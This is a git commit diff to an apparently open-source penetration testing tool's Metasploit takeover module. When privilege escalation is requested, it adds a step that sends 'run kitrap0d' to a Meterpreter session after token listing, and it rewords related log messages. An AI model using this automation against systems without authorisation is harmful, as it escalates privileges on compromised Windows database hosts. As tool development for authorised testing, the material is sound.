run kitrap0d script along with listing Windows Impersonation Tokens via meterpreter's incognito extension when --priv-esc is provided (see #149).

2024-11-25 02:53:46 +03:00 · 2010-01-26 01:14:44 +00:00 · 2010-01-26 01:14:44 +00:00 · 6437c16156
commit 6437c16156
parent a97e20d8e1
2 changed files with 14 additions and 6 deletions
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@ -187,9 +187,10 @@ class Metasploit:
    def __selectPayload(self, askChurrasco=True):
        if kb.os == "Windows" and conf.privEsc:
            infoMsg  = "forcing Metasploit payload to Meterpreter because "
-            infoMsg += "it is the only payload that can abuse Windows "
-            infoMsg += "Access Tokens via Meterpreter 'incognito' "
-            infoMsg += "extension to privilege escalate"
+            infoMsg += "it is the only payload that can be used to "
+            infoMsg += "escalate privileges, either via 'incognito' "
+            infoMsg += "extension or via 'kitrap0d' script, "
+            infoMsg += "http://tinyurl.com/kitrap0d for details"
            logger.info(infoMsg)

            __payloadStr = "windows/meterpreter"
@ -458,6 +459,12 @@ class Metasploit:

            proc.stdin.write("list_tokens -u\n")

+            infoMsg  = "trying also to escalate privileges using "
+            infoMsg += "kitrap0d script"
+            logger.info(infoMsg)
+
+            proc.stdin.write("run kitrap0d\n")
+
    def __controlMsfCmd(self, proc, func):
        stdin_fd = sys.stdin.fileno()
        setNonBlocking(stdin_fd)
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@ -165,15 +165,16 @@ class Takeover(Abstraction, Metasploit, Registry):
                    warnMsg  = "by default PostgreSQL on Windows runs as postgres "
                    warnMsg += "user which has no Windows Impersonation "
                    warnMsg += "Tokens: it is unlikely that the privilege "
-                    warnMsg += "escalation will be successful"
+                    warnMsg += "escalation via 'incognito' extension will "
+                    warnMsg += "be successful"
                    logger.warn(warnMsg)

                elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
                    warnMsg  = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
                    warnMsg += "runs as Network Service which has no Windows "
                    warnMsg += "Impersonation Tokens within all threads, this "
-                    warnMsg += "makes Meterpreter's incognito extension to "
-                    warnMsg += "fail to list tokens"
+                    warnMsg += "makes Meterpreter's 'incognito' extension "
+                    warnMsg += "to fail to list tokens"
                    logger.warn(warnMsg)

                    uploaded = self.uploadChurrasco()